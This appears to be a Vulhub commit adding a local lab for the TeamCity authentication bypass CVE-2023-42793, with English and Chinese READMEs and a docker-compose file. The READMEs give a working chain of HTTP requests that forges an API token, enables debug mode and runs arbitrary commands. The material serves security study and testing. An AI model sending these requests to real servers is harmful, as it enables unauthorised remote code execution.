first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
teamcity/CVE-2023-42793/1.png
Normal file
BIN
teamcity/CVE-2023-42793/1.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 23 KiB |
BIN
teamcity/CVE-2023-42793/2.png
Normal file
BIN
teamcity/CVE-2023-42793/2.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 57 KiB |
BIN
teamcity/CVE-2023-42793/3.png
Normal file
BIN
teamcity/CVE-2023-42793/3.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 55 KiB |
BIN
teamcity/CVE-2023-42793/4.png
Normal file
BIN
teamcity/CVE-2023-42793/4.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 54 KiB |
103
teamcity/CVE-2023-42793/README.md
Normal file
103
teamcity/CVE-2023-42793/README.md
Normal file
@@ -0,0 +1,103 @@
|
||||
# Jetbrains TeamCity Authentication Bypass and Remote Command Execution (CVE-2023-42793)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
TeamCity is a general-purpose CI/CD software platform that allows for flexible workflows, collaboration and development practices.
|
||||
|
||||
TeamCity server version 2023.05.3 and below is prone to an authentication bypass, which allows an unauthenticated attacker to gain remote code execution (RCE) on the server.
|
||||
|
||||
References:
|
||||
|
||||
- <https://www.sonarsource.com/blog/teamcity-vulnerability/>
|
||||
- <https://blog.projectdiscovery.io/cve-2023-42793-vulnerability-in-jetbrains-teamcity/>
|
||||
|
||||
## Vulnerable Environment
|
||||
|
||||
Execute following command to start a TeamCity server 2023.05.3:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the server is started, you should do the initialization steps on `http://localhost:8111`:
|
||||
|
||||

|
||||
|
||||
## Exploit
|
||||
|
||||
The key point of this issue is that, all the requests end with `/RPC2` wouldn't be authenticated.
|
||||
|
||||
To exploit the issue, send the following request to add a rest API token that name is `RPC2`:
|
||||
|
||||
```
|
||||
POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
|
||||
Host: localhost:8111
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept: */*
|
||||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 0
|
||||
|
||||
|
||||
```
|
||||
|
||||

|
||||
|
||||
Success to generate a rest API token. Then, enable the debug mode with the API token:
|
||||
|
||||
```
|
||||
POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
|
||||
Host: localhost:8111
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept: */*
|
||||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 0
|
||||
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UTlaUm5sYzQtRUZ0YTNhT1llU2xpTU43TjNF.MWY2NjI4MmQtYzFlMi00YTEwLTk1ZTEtMDFiZmZiOGY2NGY0
|
||||
|
||||
|
||||
```
|
||||
|
||||

|
||||
|
||||
You are able to execute arbitrary commands after the debug mode is enabled:
|
||||
|
||||
```
|
||||
POST /app/rest/debug/processes?exePath=id HTTP/1.1
|
||||
Host: localhost:8111
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept: */*
|
||||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Content-Length: 0
|
||||
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UTlaUm5sYzQtRUZ0YTNhT1llU2xpTU43TjNF.MWY2NjI4MmQtYzFlMi00YTEwLTk1ZTEtMDFiZmZiOGY2NGY0
|
||||
|
||||
|
||||
```
|
||||
|
||||

|
||||
|
||||
It's better to delete the API token that we added before:
|
||||
|
||||
```
|
||||
DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
|
||||
Host: localhost:8111
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept: */*
|
||||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 0
|
||||
|
||||
|
||||
```
|
101
teamcity/CVE-2023-42793/README.zh-cn.md
Normal file
101
teamcity/CVE-2023-42793/README.zh-cn.md
Normal file
@@ -0,0 +1,101 @@
|
||||
# Jetbrains TeamCity 认证绕过导致远程命令执行漏洞(CVE-2023-42793)
|
||||
|
||||
TeamCity 是 JetBrains 的构建管理和持续集成服务器。
|
||||
|
||||
在 TeamCity 2023.05.3 版本及以前,存在一处由于逻辑错误导致的认证绕过漏洞,攻击者利用该漏洞最终可以在目标服务器上执行任意命令。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://www.sonarsource.com/blog/teamcity-vulnerability/>
|
||||
- <https://blog.projectdiscovery.io/cve-2023-42793-vulnerability-in-jetbrains-teamcity/>
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
执行如下命令启动一个 TeamCity 2023.05.3 服务器:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
服务启动后,你需要打开`http://localhost:8111`并执行一系列初始化操作:
|
||||
|
||||

|
||||
|
||||
## 漏洞复现
|
||||
|
||||
造成这个漏洞的原因是 TeamCity 内部对于所有以`/RPC2`为后缀结尾的请求都不认证权限。
|
||||
|
||||
而正好添加API Token的请求的结尾参数是Token的名字,我们可以添加一个名字为`RPC2`的API Token:
|
||||
|
||||
```
|
||||
POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
|
||||
Host: localhost:8111
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept: */*
|
||||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 0
|
||||
|
||||
|
||||
```
|
||||
|
||||

|
||||
|
||||
这样就成功绕过权限认证生成了一个新的Token。使用该Token来开启调试模式:
|
||||
|
||||
```
|
||||
POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
|
||||
Host: localhost:8111
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept: */*
|
||||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 0
|
||||
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UTlaUm5sYzQtRUZ0YTNhT1llU2xpTU43TjNF.MWY2NjI4MmQtYzFlMi00YTEwLTk1ZTEtMDFiZmZiOGY2NGY0
|
||||
|
||||
|
||||
```
|
||||
|
||||

|
||||
|
||||
开启调试模式后,就可以执行任意命令了:
|
||||
|
||||
```
|
||||
POST /app/rest/debug/processes?exePath=id HTTP/1.1
|
||||
Host: localhost:8111
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept: */*
|
||||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Content-Length: 0
|
||||
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UTlaUm5sYzQtRUZ0YTNhT1llU2xpTU43TjNF.MWY2NjI4MmQtYzFlMi00YTEwLTk1ZTEtMDFiZmZiOGY2NGY0
|
||||
|
||||
|
||||
```
|
||||
|
||||

|
||||
|
||||
利用结束后,我们最好能够删除名为`RPC2`的API Token,避免对业务造成问题:
|
||||
|
||||
```
|
||||
DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
|
||||
Host: localhost:8111
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept: */*
|
||||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 0
|
||||
|
||||
|
||||
```
|
9
teamcity/CVE-2023-42793/docker-compose.yml
Normal file
9
teamcity/CVE-2023-42793/docker-compose.yml
Normal file
@@ -0,0 +1,9 @@
|
||||
version: '2'
|
||||
services:
|
||||
web:
|
||||
image: vulhub/teamcity:2023.05.3
|
||||
ports:
|
||||
- "8111:8111"
|
||||
- "5005:5005"
|
||||
environment:
|
||||
- TEAMCITY_SERVER_OPTS=-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005
|
Reference in New Issue
Block a user